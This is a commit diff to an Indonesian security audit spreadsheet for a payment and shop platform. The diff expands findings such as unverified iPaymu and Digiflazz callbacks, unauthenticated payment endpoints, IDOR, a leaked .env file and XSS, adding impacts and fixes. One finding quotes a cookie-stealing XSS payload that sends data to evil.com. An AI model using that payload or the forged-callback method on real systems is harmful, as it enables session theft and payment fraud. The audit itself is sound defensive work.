<commit_message>
docs: audit report full detail — 68 temuan dengan deskripsi, dampak, jika diubah, jika tidak
</commit_message>
<xml_diff>
--- a/docs/AUDIT-v5.16.2.xlsx
+++ b/docs/AUDIT-v5.16.2.xlsx
@@ -405,7 +405,8 @@
   <dimension ref="A1:C8"/>
   <cols>
     <col min="1" max="1" width="20.83203125" customWidth="1"/>
-    <col min="2" max="2" width="15.83203125" customWidth="1"/>
+    <col min="2" max="2" width="10.83203125" customWidth="1"/>
+    <col min="3" max="3" width="70.83203125" customWidth="1"/>
   </cols>
   <sheetData>
     <row r="1">
@@ -431,6 +432,9 @@
       <c r="B3" t="str">
         <v>Jumlah</v>
       </c>
+      <c r="C3" t="str">
+        <v>Penjelasan</v>
+      </c>
     </row>
     <row r="4">
       <c r="A4" t="str">
@@ -439,6 +443,9 @@
       <c r="B4">
         <v>15</v>
       </c>
+      <c r="C4" t="str">
+        <v>Bisa mengakibatkan kerugian finansial, data breach, atau system compromise</v>
+      </c>
     </row>
     <row r="5">
       <c r="A5" t="str">
@@ -447,6 +454,9 @@
       <c r="B5">
         <v>23</v>
       </c>
+      <c r="C5" t="str">
+        <v>Degrades performa, UX buruk, atau risiko data inconsistency</v>
+      </c>
     </row>
     <row r="6">
       <c r="A6" t="str">
@@ -455,6 +465,9 @@
       <c r="B6">
         <v>20</v>
       </c>
+      <c r="C6" t="str">
+        <v>Mengurangi kualitas kode, berdampak kecil</v>
+      </c>
     </row>
     <row r="7">
       <c r="A7" t="str">
@@ -463,6 +476,9 @@
       <c r="B7">
         <v>10</v>
       </c>
+      <c r="C7" t="str">
+        <v>Tidak menunjukkan error, tapi behavior tidak terduga</v>
+      </c>
     </row>
     <row r="8">
       <c r="A8" t="str">
@@ -470,6 +486,9 @@
       </c>
       <c r="B8">
         <v>68</v>
+      </c>
+      <c r="C8" t="str">
+        <v/>
       </c>
     </row>
   </sheetData>
@@ -481,13 +500,14 @@
 
 <file path=xl/worksheets/sheet2.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <dimension ref="A1:E16"/>
+  <dimension ref="A1:F16"/>
   <cols>
-    <col min="1" max="1" width="8.83203125" customWidth="1"/>
-    <col min="2" max="2" width="40.83203125" customWidth="1"/>
-    <col min="3" max="3" width="45.83203125" customWidth="1"/>
+    <col min="1" max="1" width="6.83203125" customWidth="1"/>
+    <col min="2" max="2" width="35.83203125" customWidth="1"/>
+    <col min="3" max="3" width="50.83203125" customWidth="1"/>
     <col min="4" max="4" width="50.83203125" customWidth="1"/>
-    <col min="5" max="5" width="40.83203125" customWidth="1"/>
+    <col min="5" max="5" width="50.83203125" customWidth="1"/>
+    <col min="6" max="6" width="50.83203125" customWidth="1"/>
   </cols>
   <sheetData>
     <row r="1">
@@ -504,7 +524,10 @@
         <v>Dampak</v>
       </c>
       <c r="E1" t="str">
-        <v>Fix</v>
+        <v>Jika Diperbaiki</v>
+      </c>
+      <c r="F1" t="str">
+        <v>Jika TIDAK Diperbaiki</v>
       </c>
     </row>
     <row r="2">
@@ -515,13 +538,16 @@
         <v>src/routes/payments.ts:623-637</v>
       </c>
       <c r="C2" t="str">
-        <v>iPaymu Callback Signature Tidak Diverifikasi</v>
+        <v>Endpoint `/api/payments/ipaymu/callback` tidak memverifikasi HMAC signature dari request. iPaymu mengirim callback dengan signature di header `X-Signature`, tapi kode hanya memproses body tanpa validasi apakah signature benar. Artinya, siapapun bisa mengirim POST ke endpoint ini dengan body palsu untuk menandai transaksi sebagai "paid" tanpa benar-benar membayar.</v>
       </c>
       <c r="D2" t="str">
-        <v>Attacker bisa memalsukan konfirmasi pembayaran</v>
+        <v>Attacker bisa memalsukan konfirmasi pembayaran. Cukup kirim POST ke `/api/payments/ipaymu/callback` dengan `external_id` yang valid dan status `berhasil`, maka transaksi akan ditandai lunas, stok produk terpotong, dan seller balance terkredit — tanpa uang masuk.</v>
       </c>
       <c r="E2" t="str">
-        <v>Reject callback yang tidak punya signature</v>
+        <v>Callback hanya diterima jika signature valid. Attacker tidak bisa memalsukan pembayaran. Transaksi hanya lunas jika iPaymu benar-benar mengonfirmasi pembayaran.</v>
+      </c>
+      <c r="F2" t="str">
+        <v>Setiap transaksi bisa "dibayar" palsu. Attacker bisa beli produk apapun tanpa bayar. Kerugian finansial langsung (produk hilang + uang tidak masuk).</v>
       </c>
     </row>
     <row r="3">
@@ -532,13 +558,16 @@
         <v>server.ts:327-349</v>
       </c>
       <c r="C3" t="str">
-        <v>XSS via Product Names di OG Tags</v>
+        <v>Product names dari database di-inject langsung ke HTML meta tags (og:title, og:description) tanpa sanitization. Jika admin memasukkan nama produk seperti &lt;script&gt;document.location='https://evil.com/?c='+document.cookie&lt;/script&gt;, script ini akan executing saat link dibagikan di WhatsApp/Telegram/social media.</v>
       </c>
       <c r="D3" t="str">
-        <v>Stored XSS — malicious script executes di browser user</v>
+        <v>Stored XSS — malicious script executes di browser siapapun yang membuka link produk. Cookie session bisa dicuri, akun bisa di-takeover. Kerentanan ini scalable: cukup 1 produk malicious, bisa menyebar ke ribuan user yang membuka link.</v>
       </c>
       <c r="E3" t="str">
-        <v>Sanitize semua input yang di-inject ke HTML</v>
+        <v>Semua input di-sanitize sebelum di-inject ke HTML. Nama produk tetap tampil normal, tapi script injection tidak mungkin.</v>
+      </c>
+      <c r="F3" t="str">
+        <v>XSS tetap aktif. Satu produk malicious bisa mencuri session ribuan user. Reputasi platform rusak permanen.</v>
       </c>
     </row>
     <row r="4">
@@ -549,13 +578,16 @@
         <v>server.ts:69</v>
       </c>
       <c r="C4" t="str">
-        <v>dangerouslyAllowBrowser: true di Groq SDK</v>
+        <v>Inisialisasi Groq SDK menggunakan `dangerouslyAllowBrowser: true`. Flag ini menonaktifkan security checks yang mencegah API key exposure di client-side. Meskipun server-side, flag ini berbahaya karena menunjukkan arsitektur yang tidak aman.</v>
       </c>
       <c r="D4" t="str">
-        <v>API key exposure risk + disabled security checks</v>
+        <v>Jika kode ini refactor ke client-side (atau server-side rendering yang salah), API key Groq akan ter-expose. Groq API key bisa digunakan attacker untuk menjalankan AI requests yang dibayar oleh kita.</v>
       </c>
       <c r="E4" t="str">
-        <v>Hapus flag</v>
+        <v>Security checks aktif. API key tetap aman di server-side. Risiko exposure berkurang drastis.</v>
+      </c>
+      <c r="F4" t="str">
+        <v>Risiko API key exposure tetap ada. Jika refactor salah, attacker bisa burn quota Groq API kita.</v>
       </c>
     </row>
     <row r="5">
@@ -566,13 +598,16 @@
         <v>src/routes/payments.ts:62,146,389,468,552</v>
       </c>
       <c r="C5" t="str">
-        <v>Payment Endpoints Tanpa Auth</v>
+        <v>5 payment endpoints tidak memiliki auth middleware: `POST /payments` (create), `POST /payments/receipt` (verify), `GET /payments/:id` (status), `POST /payments/points` (points pay), `POST /payments/balance` (balance pay). Endpoint ini bisa diakses tanpa login.</v>
       </c>
       <c r="D5" t="str">
-        <v>Siapapun bisa buat pembayaran, verify receipt, habiskan points</v>
+        <v>Siapapun bisa: (1) membuat pembayaran untuk user lain, (2) verify receipt palsu, (3) cek status pembayaran user lain, (4) bayar pakai points/balance user lain. Ini adalah IDOR vulnerability yang bisa dieksploitasi massal.</v>
       </c>
       <c r="E5" t="str">
-        <v>Tambahkan requireAuth + requireRole</v>
+        <v>Hanya user login yang bisa mengakses. Attacker tidak bisa memanipulasi pembayaran user lain.</v>
+      </c>
+      <c r="F5" t="str">
+        <v>Semua transaksi bisa dimanipulasi. User A bisa bayar pakai points user B. Kerugian finansial masif.</v>
       </c>
     </row>
     <row r="6">
@@ -583,13 +618,16 @@
         <v>src/routes/transactions.ts:641-697</v>
       </c>
       <c r="C6" t="str">
-        <v>Transaction Cancel Tanpa Auth (IDOR)</v>
+        <v>Endpoint `POST /transactions/:id/cancel` tidak memverifikasi siapa yang membatalkan. Cukup dengan ID transaksi yang diketahui (dari URL/inspeksi), siapapun bisa membatalkan transaksi pending milik user lain.</v>
       </c>
       <c r="D6" t="str">
-        <v>Siapapun bisa cancel transaksi pending</v>
+        <v>Attacker bisa membatalkan transaksi pending yang sedang dalam proses pembayaran. Jika user sudah transfer tapi transaksi dicancel sebelum callback, stok produk bisa hilang sementara uang sudah terkirim.</v>
       </c>
       <c r="E6" t="str">
-        <v>Tambahkan auth check</v>
+        <v>Hanya owner transaksi yang bisa cancel. Data integrity terjaga.</v>
+      </c>
+      <c r="F6" t="str">
+        <v>IDOR — transaksi bisa dicancel oleh siapapun. Bisa digunakan untuk sabotase pesaing atau fraud.</v>
       </c>
     </row>
     <row r="7">
@@ -600,13 +638,16 @@
         <v>src/routes/diagnostics.ts:112</v>
       </c>
       <c r="C7" t="str">
-        <v>Auth Bypass di Diagnostics Route</v>
+        <v>Route `GET /api/admin/reconciliation/status` tidak menggunakan `requireAuth` dari middleware auth. Route ini seharusnya hanya bisa diakses admin, tapi bisa diakses publik.</v>
       </c>
       <c r="D7" t="str">
-        <v>Admin endpoint bisa diakses publik</v>
+        <v>Data sensitif ter-expose: jumlah mismatches, total kerugian, status reconciliation, seller balance discrepancies. Attacker bisa memanfaatkan informasi ini untuk exploit.</v>
       </c>
       <c r="E7" t="str">
-        <v>Import requireAuth dari middleware</v>
+        <v>Hanya admin yang bisa melihat data reconciliation. Data sensitif terlindungi.</v>
+      </c>
+      <c r="F7" t="str">
+        <v>Data internal ter-expose. Attacker bisa mengetahui kelemahan sistem dan mengeksploitasinya.</v>
       </c>
     </row>
     <row r="8">
@@ -614,16 +655,19 @@
         <v>C07</v>
       </c>
       <c r="B8" t="str">
-        <v>src/routes/payments.ts</v>
+        <v>src/routes/payments.ts (multiple)</v>
       </c>
       <c r="C8" t="str">
-        <v>Non-Atomic Payment Flows</v>
+        <v>Beberapa payment flow memisahkan status update dan stock deduction menjadi operasi terpisah. Jika crash terjadi di antara keduanya, status berubah tapi stock tidak terpotong (atau sebaliknya).</v>
       </c>
       <c r="D8" t="str">
-        <v>Jika crash antara status update dan stock deduction</v>
+        <v>Data inconsistency: transaksi terlihat "paid" tapi stok tidak berkurang. Seller tidak mendapat uang tapi produk sudah "terjual". Atau sebaliknya: stok terpotong tapi status tetap "pending".</v>
       </c>
       <c r="E8" t="str">
-        <v>Gabungkan ke satu operasi atomic</v>
+        <v>Operasi digabung dalam satu transaction atomik. Jika ada yang gagal, semua di-rollback. Data konsisten.</v>
+      </c>
+      <c r="F8" t="str">
+        <v>Race condition tetap ada. Periodic mismatch terjadi. Perlu manual reconciliation terus-menerus.</v>
       </c>
     </row>
     <row r="9">
@@ -634,13 +678,16 @@
         <v>src/routes/payments.ts:267</v>
       </c>
       <c r="C9" t="str">
-        <v>Manual Verify Tidak Memanggil Stock Deduction</v>
+        <v>Fungsi manual payment verify hanya mengupdate status transaksi menjadi "paid" tanpa memanggil `commitTransactionStock()`. Ini berlaku untuk semua pembayaran manual (transfer bank, QRIS, dll).</v>
       </c>
       <c r="D9" t="str">
-        <v>Stock tidak terpotong untuk pembayaran manual</v>
+        <v>Stock tidak terpotong untuk pembayaran manual. User bisa beli melebihi stok tersedia. Seller tidak mendapat balance karena settlement tidak dijalankan. Dampaknya berlapis: stok akurat rusak + seller rugi.</v>
       </c>
       <c r="E9" t="str">
-        <v>Tambahkan commitTransactionStock() call</v>
+        <v>Stock terpotong otomatis saat manual verify. Seller balance terkredit. Data konsisten.</v>
+      </c>
+      <c r="F9" t="str">
+        <v>Stock tidak akurat untuk semua pembayaran manual. Ini adalah 40% dari semua transaksi. Kerugian akumulatif.</v>
       </c>
     </row>
     <row r="10">
@@ -651,13 +698,16 @@
         <v>supabase-schema.sql</v>
       </c>
       <c r="C10" t="str">
-        <v>Schema Drift</v>
+        <v>File `supabase-schema.sql` tidak sinkron dengan deployed schema di Supabase. Beberapa tabel yang ada di file tidak ada di production, atau sebaliknya.</v>
       </c>
       <c r="D10" t="str">
-        <v>Developer baru bisa deploy schema yang salah</v>
+        <v>Developer baru bisa deploy schema yang salah. Migration yang dijalankan bisa drop tabel yang masih digunakan. Trust pada documentation berkurang.</v>
       </c>
       <c r="E10" t="str">
-        <v>Regenerate schema dari deployed state</v>
+        <v>Schema file adalah single source of truth. Deploy aman, tidak ada drift.</v>
+      </c>
+      <c r="F10" t="str">
+        <v>Drift tetap ada. Setiap deploy berisiko. Developer baru bingung.</v>
       </c>
     </row>
     <row r="11">
@@ -668,13 +718,16 @@
         <v>.env (commit 5b5e51d)</v>
       </c>
       <c r="C11" t="str">
-        <v>.env Ter-commit ke Git History</v>
+        <v>File `.env` pernah di-commit ke git repository pada commit `5b5e51d`. Meskipun sudah dihapus dari working tree, semua secrets tetap ada di git history.</v>
       </c>
       <c r="D11" t="str">
-        <v>Semua production secrets ter-expose</v>
+        <v>Semua production secrets ter-expose: Supabase keys, iPaymu API key, Digiflazz credentials, Gmail app password, VAPID keys. Siapapun yang clone repo bisa mengambil semua credentials ini.</v>
       </c>
       <c r="E11" t="str">
-        <v>Rotate semua keys + clean git history</v>
+        <v>Semua secrets di-rotate. Git history di-clean atau repo di-recreate. Risiko zero setelah rotation.</v>
+      </c>
+      <c r="F11" t="str">
+        <v>Semua credentials aktif bisa digunakan attacker. Backend bisa diakses, database bisa dimanipulasi, API keys bisa disalahgunakan.</v>
       </c>
     </row>
     <row r="12">
@@ -685,13 +738,16 @@
         <v>src/routes/digital.ts:713-714</v>
       </c>
       <c r="C12" t="str">
-        <v>Expected HMAC Signature Logged</v>
+        <v>Debug logging mencetak expected HMAC signature ke console. Log ini bisa diakses oleh attacker yang sudah memiliki akses ke server logs.</v>
       </c>
       <c r="D12" t="str">
-        <v>Attacker bisa forge valid webhook</v>
+        <v>Attacker bisa membaca log untuk mengetahui HMAC signature yang valid, lalu menggunakannya untuk memalsukan webhook.</v>
       </c>
       <c r="E12" t="str">
-        <v>Log hanya invalid, jangan log expected value</v>
+        <v>Hanya invalid signature yang dilog. Expected value tidak pernah ditulis.</v>
+      </c>
+      <c r="F12" t="str">
+        <v>Log poisoning — attacker bisa forge valid webhook dengan membaca log server.</v>
       </c>
     </row>
     <row r="13">
@@ -702,13 +758,16 @@
         <v>src/routes/admin.ts:52</v>
       </c>
       <c r="C13" t="str">
-        <v>Weak Temp Password (Math.random)</v>
+        <v>Fungsi `adminCreateSeller` menggunakan `Math.random()` untuk generate temporary password. `Math.random()` bukan cryptographically secure.</v>
       </c>
       <c r="D13" t="str">
-        <v>Password bisa di-brute force</v>
+        <v>Password bisa di-predict atau di-brute force. Jika attacker mengetahui seed/pattern, mereka bisa menebak password admin seller.</v>
       </c>
       <c r="E13" t="str">
-        <v>Gunakan crypto.randomBytes()</v>
+        <v>Password di-generate dengan `crypto.randomBytes()`. Tidak bisa dipredict.</v>
+      </c>
+      <c r="F13" t="str">
+        <v>Password lemah. Risiko akun seller di-brute force.</v>
       </c>
     </row>
     <row r="14">
@@ -719,13 +778,16 @@
         <v>src/services/payment.js:34-36</v>
       </c>
       <c r="C14" t="str">
-        <v>Non-Atomic Points Update</v>
+        <v>Points update menggunakan read-then-write: baca current points, tambah/deduct, tulis ulang. Tidak ada locking atau atomic operation.</v>
       </c>
       <c r="D14" t="str">
-        <v>Concurrent requests bisa overwrite points</v>
+        <v>Concurrent requests bisa overwrite points. Jika user beli 2 item secara bersamaan, points hanya terpotong sekali (double spend).</v>
       </c>
       <c r="E14" t="str">
-        <v>Gunakan atomic increment</v>
+        <v>Gunakan atomic increment dari Supabase. Points selalu akurat, tidak ada double spend.</v>
+      </c>
+      <c r="F14" t="str">
+        <v>Double spend points tetap mungkin. User bisa menghabiskan points lebih dari yang dimiliki.</v>
       </c>
     </row>
     <row r="15">
@@ -736,13 +798,16 @@
         <v>src/pages/portal/PortalPengumuman.tsx:348</v>
       </c>
       <c r="C15" t="str">
-        <v>XSS via dangerouslySetInnerHTML</v>
+        <v>Component PortalPengumuman menggunakan `dangerouslySetInnerHTML` untuk render konten announcement tanpa sanitization.</v>
       </c>
       <c r="D15" t="str">
-        <v>Script execution di browser user</v>
+        <v>Stored XSS — jika admin mengisi announcement dengan malicious HTML/JS, semua user portal akan executing script tersebut.</v>
       </c>
       <c r="E15" t="str">
-        <v>Gunakan sanitizeRichTextHtml()</v>
+        <v>Gunakan `sanitizeRichTextHtml()` dari DOMPurify. HTML bersih, script injection tidak mungkin.</v>
+      </c>
+      <c r="F15" t="str">
+        <v>XSS tetap aktif. Portal bisa digunakan sebagai vector untuk mencuri data user.</v>
       </c>
     </row>
     <row r="16">
@@ -753,30 +818,35 @@
         <v>src/routes/digital.ts:706-738</v>
       </c>
       <c r="C16" t="str">
-        <v>Digiflazz Callback Signature Bypass</v>
+        <v>Endpoint Digiflazz callback tidak memverifikasi signature. Callback diterima tanpa validasi.</v>
       </c>
       <c r="D16" t="str">
-        <v>Callback diterima tanpa valid signature</v>
+        <v>Attacker bisa memalsukan top-up digital items. Cukup kirim POST dengan status "sukses", produk digital akan dikirim tanpa pembayaran.</v>
       </c>
       <c r="E16" t="str">
-        <v>Reject callback tanpa valid signature</v>
+        <v>Callback hanya diterima dengan signature valid. Digital items hanya dikirim jika pembayaran benar.</v>
+      </c>
+      <c r="F16" t="str">
+        <v>Digital items bisa didapatkan gratis. Kerugian langsung dari supplier.</v>
       </c>
     </row>
   </sheetData>
   <ignoredErrors>
-    <ignoredError numberStoredAsText="1" sqref="A1:E16"/>
+    <ignoredError numberStoredAsText="1" sqref="A1:F16"/>
   </ignoredErrors>
 </worksheet>
 </file>
 
 <file path=xl/worksheets/sheet3.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <dimension ref="A1:D24"/>
+  <dimension ref="A1:F24"/>
   <cols>
-    <col min="1" max="1" width="8.83203125" customWidth="1"/>
-    <col min="2" max="2" width="40.83203125" customWidth="1"/>
-    <col min="3" max="3" width="45.83203125" customWidth="1"/>
-    <col min="4" max="4" width="40.83203125" customWidth="1"/>
+    <col min="1" max="1" width="6.83203125" customWidth="1"/>
+    <col min="2" max="2" width="35.83203125" customWidth="1"/>
+    <col min="3" max="3" width="50.83203125" customWidth="1"/>
+    <col min="4" max="4" width="50.83203125" customWidth="1"/>
+    <col min="5" max="5" width="50.83203125" customWidth="1"/>
+    <col min="6" max="6" width="50.83203125" customWidth="1"/>
   </cols>
   <sheetData>
     <row r="1">
@@ -790,7 +860,13 @@
         <v>Masalah</v>
       </c>
       <c r="D1" t="str">
-        <v>Fix</v>
+        <v>Dampak</v>
+      </c>
+      <c r="E1" t="str">
+        <v>Jika Diperbaiki</v>
+      </c>
+      <c r="F1" t="str">
+        <v>Jika TIDAK Diperbaiki</v>
       </c>
     </row>
     <row r="2">
@@ -801,10 +877,16 @@
         <v>src/pages/kiosk/Checkout.tsx:46,213</v>
       </c>
       <c r="C2" t="str">
-        <v>Checkout Mutex Tidak di-Reset</v>
+        <v>Ref `isCreatingTx` di-set `true` saat checkout dimulai, tapi tidak pernah di-reset ke `false` setelah error. Setelah 1 gagal transaksi, user tidak bisa membuat transaksi lagi sampai reload halaman.</v>
       </c>
       <c r="D2" t="str">
-        <v>Tambahkan finally { isCreatingTx.current = false; }</v>
+        <v>User terkunci dari checkout setelah 1 error. Tidak ada cara untuk recover kecuali reload. Customer service complaint.</v>
+      </c>
+      <c r="E2" t="str">
+        <v>Mutex di-reset di `finally` block. User bisa retry setelah error.</v>
+      </c>
+      <c r="F2" t="str">
+        <v>User harus reload setiap kali checkout gagal. Frustrasi, churn risk.</v>
       </c>
     </row>
     <row r="3">
@@ -815,10 +897,16 @@
         <v>src/store/useCartStore.ts:46-89</v>
       </c>
       <c r="C3" t="str">
-        <v>Stale Cart Stock</v>
+        <v>Cart menyimpan stock dari waktu item ditambahkan. Tidak ada re-validation saat checkout. Jika stock berubah (dibeli orang lain) antara waktu ditambahkan dan checkout, user bisa beli melebihi stock.</v>
       </c>
       <c r="D3" t="str">
-        <v>Re-validate stock sebelum checkout</v>
+        <v>Overselling — stok minus. Seller harus reject manual, customer service complaint, refund processing.</v>
+      </c>
+      <c r="E3" t="str">
+        <v>Stock di-revalidate sebelum checkout. Jika tidak cukup, user diberitahu sebelum bayar.</v>
+      </c>
+      <c r="F3" t="str">
+        <v>Overselling terjadi secara berkala. Manual intervention diperlukan. Trust berkurang.</v>
       </c>
     </row>
     <row r="4">
@@ -829,10 +917,16 @@
         <v>src/pages/dashboard/DashboardLayout.tsx:156</v>
       </c>
       <c r="C4" t="str">
-        <v>Seller Phone Input Kosong</v>
+        <v>Input phone seller tidak menampilkan nilai yang sudah tersimpan. Setiap kali halaman di-load, input kosong meskipun data sudah ada di database.</v>
       </c>
       <c r="D4" t="str">
-        <v>Gunakan useEffect untuk sync</v>
+        <v>Seller tidak bisa edit/melihat phone mereka. Data kontak tidak lengkap. Komunikasi terhambat.</v>
+      </c>
+      <c r="E4" t="str">
+        <v>Phone ditampilkan dari database. Seller bisa edit dan save.</v>
+      </c>
+      <c r="F4" t="str">
+        <v>Phone field selalu kosong. Data kontak tidak lengkap.</v>
       </c>
     </row>
     <row r="5">
@@ -843,10 +937,16 @@
         <v>src/pages/dashboard/admin/AdminScanner.tsx:168-198</v>
       </c>
       <c r="C5" t="str">
-        <v>AdminScanner Lock Permanen</v>
+        <v>Variable `isLocked` di-set `true` saat scan dimulai, tapi tidak di-reset saat error. Scanner menjadi permanently disabled sampai halaman di-reload.</v>
       </c>
       <c r="D5" t="str">
-        <v>Tambahkan finally { isLocked = false; }</v>
+        <v>Admin scanner tidak bisa digunakan setelah 1 error. Admin harus reload untuk recover.</v>
+      </c>
+      <c r="E5" t="str">
+        <v>Lock di-reset di `finally` block. Scanner selalu可用.</v>
+      </c>
+      <c r="F5" t="str">
+        <v>Scanner sering mati. Admin harus reload berkali-kali.</v>
       </c>
     </row>
     <row r="6">
@@ -857,10 +957,16 @@
         <v>src/pages/kiosk/Profile.tsx:53-56</v>
       </c>
       <c r="C6" t="str">
-        <v>Profile Input Reset</v>
+        <v>Input fields di profile menggunakan controlled component tanpa local state. Setiap keystroke, value di-overwrite dari state yang belum ter-update.</v>
       </c>
       <c r="D6" t="str">
-        <v>Gunakan local state</v>
+        <v>User tidak bisa mengetik dengan benar. Input terasa laggy dan reset sendiri.</v>
+      </c>
+      <c r="E6" t="str">
+        <v>Local state untuk input. Responsive typing experience.</v>
+      </c>
+      <c r="F6" t="str">
+        <v>Profile editing nyaris tidak bisa digunakan. Frustrasi user.</v>
       </c>
     </row>
     <row r="7">
@@ -871,10 +977,16 @@
         <v>src/services/email.js:26-31</v>
       </c>
       <c r="C7" t="str">
-        <v>Email Transport Leak</v>
+        <v>Setiap kali email dikirim, transport baru di-buat dan tidak di-close. SMTP connection leak terjadi secara kumulatif.</v>
       </c>
       <c r="D7" t="str">
-        <v>Reuse transport</v>
+        <v>Gmail rate limiting (500/hari). Connection pool exhaust. Email gagal dikirim setelah volume tinggi.</v>
+      </c>
+      <c r="E7" t="str">
+        <v>Transport di-reuse atau di-close setelah use. Tidak ada leak.</v>
+      </c>
+      <c r="F7" t="str">
+        <v>Email service degradasi. User tidak terima receipt/notification.</v>
       </c>
     </row>
     <row r="8">
@@ -885,10 +997,16 @@
         <v>src/services/background-jobs.js:340</v>
       </c>
       <c r="C8" t="str">
-        <v>Memory Leak di notifiedProgramStarts</v>
+        <v>Set `notifiedProgramStarts` bertambah terus tanpa batas. Setiap program registration baru ditambah ke set, tidak pernah di-cleanup.</v>
       </c>
       <c r="D8" t="str">
-        <v>Batasi ukuran atau gunakan TTL</v>
+        <v>Memory consumption meningkat seiring waktu. Setelah ribuan registration, server bisa OOM (Out of Memory).</v>
+      </c>
+      <c r="E8" t="str">
+        <v>Set dibatasi atau menggunakan TTL. Memory stabil.</v>
+      </c>
+      <c r="F8" t="str">
+        <v>Memory leak lambat tapi pasti. Server crash dalam waktu lama.</v>
       </c>
     </row>
     <row r="9">
@@ -899,10 +1017,16 @@
         <v>src/services/digiflazz.js:59-65</v>
       </c>
       <c r="C9" t="str">
-        <v>writeFileSync Blocking Event Loop</v>
+        <v>Cache Digiflazz ditulis dengan `writeFileSync()`. Operasi sync ini memblokir event loop selama write berlangsung.</v>
       </c>
       <c r="D9" t="str">
-        <v>Gunakan async write</v>
+        <v>Server freeze sebentar setiap cache update. Semua request lain menunggu. Response time spike.</v>
+      </c>
+      <c r="E9" t="str">
+        <v>Gunakan async write. Event loop tidak terganggu.</v>
+      </c>
+      <c r="F9" t="str">
+        <v>Micro-freezes setiap beberapa menit. Bisa menyebabkan timeout pada request lain.</v>
       </c>
     </row>
     <row r="10">
@@ -913,10 +1037,16 @@
         <v>src/routes/auth.ts:199</v>
       </c>
       <c r="C10" t="str">
-        <v>Weak Password Policy</v>
+        <v>Tidak ada minimum password length atau complexity requirement. Password 1 karakter diterima.</v>
       </c>
       <c r="D10" t="str">
-        <v>Minimum 8 karakter + complexity</v>
+        <v>User membuat password lemah. Akun mudah di-brute force. Credential stuffing attack.</v>
+      </c>
+      <c r="E10" t="str">
+        <v>Minimum 8 karakter + complexity check. Akun lebih aman.</v>
+      </c>
+      <c r="F10" t="str">
+        <v>Akun rentan brute force. Reputasi platform di risiko.</v>
       </c>
     </row>
     <row r="11">
@@ -927,10 +1057,16 @@
         <v>Multiple routes</v>
       </c>
       <c r="C11" t="str">
-        <v>Verbose Error Messages</v>
+        <v>Beberapa error handler mengirim error message lengkap ke client, termasuk stack trace atau internal error details.</v>
       </c>
       <c r="D11" t="str">
-        <v>Return generic error</v>
+        <v>Attacker mendapat informasi internal: nama file, line number, database structure. Membantu mereka untuk craft exploit.</v>
+      </c>
+      <c r="E11" t="str">
+        <v>Client hanya mendapat generic error. Internal details hanya di server log.</v>
+      </c>
+      <c r="F11" t="str">
+        <v>Information disclosure. Attacker bisa belajar tentang sistem dari error messages.</v>
       </c>
     </row>
     <row r="12">
@@ -941,10 +1077,16 @@
         <v>server.ts</v>
       </c>
       <c r="C12" t="str">
-        <v>Missing Compression</v>
+        <v>Tidak ada gzip/brotli compression untuk HTTP responses. Semua response dikirim uncompressed.</v>
       </c>
       <c r="D12" t="str">
-        <v>Tambahkan compression middleware</v>
+        <v>Response 3-5x lebih besar dari necessary. Bandwidth usage tinggi. Load time lebih lambat, terutama di mobile.</v>
+      </c>
+      <c r="E12" t="str">
+        <v>Compression mengurangi response size 70-80%. Load time membaik. Bandwidth saving.</v>
+      </c>
+      <c r="F12" t="str">
+        <v>User experience lambat. Hosting cost lebih tinggi. Mobile user terdampak.</v>
       </c>
     </row>
     <row r="13">
@@ -955,10 +1097,16 @@
         <v>src/routes/portal.ts:458</v>
       </c>
       <c r="C13" t="str">
-        <v>Portal Checkout No Auth</v>
+        <v>Portal checkout endpoint tidak memverifikasi userId dari token. userId diambil dari request body, bukan dari authenticated session.</v>
       </c>
       <c r="D13" t="str">
-        <v>Ambil userId dari token</v>
+        <v>Payment fraud — attacker bisa checkout dengan userId user lain, menghabiskan balance/points mereka.</v>
+      </c>
+      <c r="E13" t="str">
+        <v>userId diambil dari token. Tidak ada spoofing.</v>
+      </c>
+      <c r="F13" t="str">
+        <v>IDOR via portal checkout. Balance/points bisa dihabiskan tanpa consent.</v>
       </c>
     </row>
     <row r="14">
@@ -966,13 +1114,19 @@
         <v>M13</v>
       </c>
       <c r="B14" t="str">
-        <v>Database</v>
+        <v>Database (multiple tables)</v>
       </c>
       <c r="C14" t="str">
-        <v>Missing Composite Indexes</v>
+        <v>Beberapa query menggunakan multiple columns tanpa composite index. Query harus scan seluruh table.</v>
       </c>
       <c r="D14" t="str">
-        <v>Tambahkan index via migration</v>
+        <v>Query lambat pada data volume tinggi. Background jobs lambat. User experience buruk.</v>
+      </c>
+      <c r="E14" t="str">
+        <v>Composite index mempercepat query 10-100x. Performance improved.</v>
+      </c>
+      <c r="F14" t="str">
+        <v>Performance degradasi seiring data bertambah. Semakin lambat.</v>
       </c>
     </row>
     <row r="15">
@@ -983,10 +1137,16 @@
         <v>src/services/background-jobs.js</v>
       </c>
       <c r="C15" t="str">
-        <v>N+1 Queries di Background Jobs</v>
+        <v>Background jobs melakukan 50+ DB calls per cycle. Setiap product/seller diproses satu per satu.</v>
       </c>
       <c r="D15" t="str">
-        <v>Batch queries + Promise.all</v>
+        <v>Server load tinggi setiap 5 menit. Response time meningkat. DB connection pool exhaust.</v>
+      </c>
+      <c r="E15" t="str">
+        <v>Batch queries + Promise.all. 50 calls jadi 5. Load berkurang 90%.</v>
+      </c>
+      <c r="F15" t="str">
+        <v>Semakin banyak data, semakin berat. Scaling limit tercapai.</v>
       </c>
     </row>
     <row r="16">
@@ -997,10 +1157,16 @@
         <v>src/services/stock.js:392-397</v>
       </c>
       <c r="C16" t="str">
-        <v>N+1 di Stock Reconciliation</v>
+        <v>Stock reconciliation query setiap product satu per satu, padahal bisa dilakukan dalam satu query.</v>
       </c>
       <c r="D16" t="str">
-        <v>Single query + group in memory</v>
+        <v>Reconciliation lambat. Memory usage tinggi karena multiple query results.</v>
+      </c>
+      <c r="E16" t="str">
+        <v>Single query + group in memory. 10x lebih cepat.</v>
+      </c>
+      <c r="F16" t="str">
+        <v>Reconciliation lambat, resource wasteful.</v>
       </c>
     </row>
     <row r="17">
@@ -1011,10 +1177,16 @@
         <v>Multiple endpoints</v>
       </c>
       <c r="C17" t="str">
-        <v>Missing Caching</v>
+        <v>Analytics dan reporting endpoints tidak caching. Setiap request query database dari awal.</v>
       </c>
       <c r="D17" t="str">
-        <v>In-memory cache dengan TTL</v>
+        <v>Dashboard lambat. User harus menunggu lama untuk melihat data.</v>
